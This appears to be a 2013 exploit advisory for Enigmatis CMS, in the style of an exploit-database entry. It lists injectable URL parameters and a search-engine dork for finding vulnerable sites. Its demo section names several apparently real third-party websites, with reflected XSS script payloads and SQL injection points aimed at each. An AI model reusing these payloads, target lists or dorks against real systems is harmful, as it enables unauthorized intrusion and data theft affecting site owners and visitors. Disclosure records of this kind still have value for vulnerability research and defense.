########################################################################
#
# Exploit Title: Enigmatis CMS XSS/SQLInjection Vulnerability
# Date: 2013 4 November
# Author: Hossein Hezami ( Dr.3v1l )
# Vendor: http://www.enigmatis.pl
# Version: All Version
# Security Risk: High
# Category: WebApps
# Google Keywords: intext:"Created by Enigmatis" inurl:"pl/?pid="
# Tested on: Linux
#
########################################################################
#
# [~] Exploit :
#
#	[TARGET]/index.php?pid=search&code=pages&searchText=[XSS]
#	[TARGET]/index.php?pid=[XSS]
#	[TARGET]/[XSS In SearchBox]
#	[TARGET]/?pid=[SQL Injection]
#
########################################################################
#
# [~] Demo :
#
# http://dialeks.com.pl/index.php?pid=search&code=pages&searchText="><script>alert(/Dr.3v1l/)</script>
# http://dialeks.com.pl/?pid=22[SQL Injection]
# http://mops.com.pl/index.php?pid=78&code=pages&searchText="><script>alert(/Dr.3v1l/)</script>
# http://mops.com.pl/?pid=225[SQL Injection]
# http://farmutil-hs.pl/index.php[XSS In SearchBox]
# http://farmutil-hs.pl/?pid=19[SQL Injection]
# http://porkpro.pl/?pid=38[SQL Injection]
# http://stalexport-autostrady.pl/index.php?pid=5"><script>alert(/Dr.3v1l/)</script>
# http://stalexport-autostrady.pl/?pid=59[SQL Injection]
#
########################################################################
#
# [~] Contact Me :
#
#     Teacher.3v1l@live.com
#     B.Devils.B@gmail.com
#     Twitter.com/Doctor_3v1l
#     IR.LinkedIN.com/in/Hossein3v1l
#
#     http://0websecurity.ir
#
########################################################################
# TNX : Am!r (IEDB.IR) , EST members , RHH members , IrSecT members
# TNX : IBH Team , BDB Team (Black_Devils B0ys)
########################################################################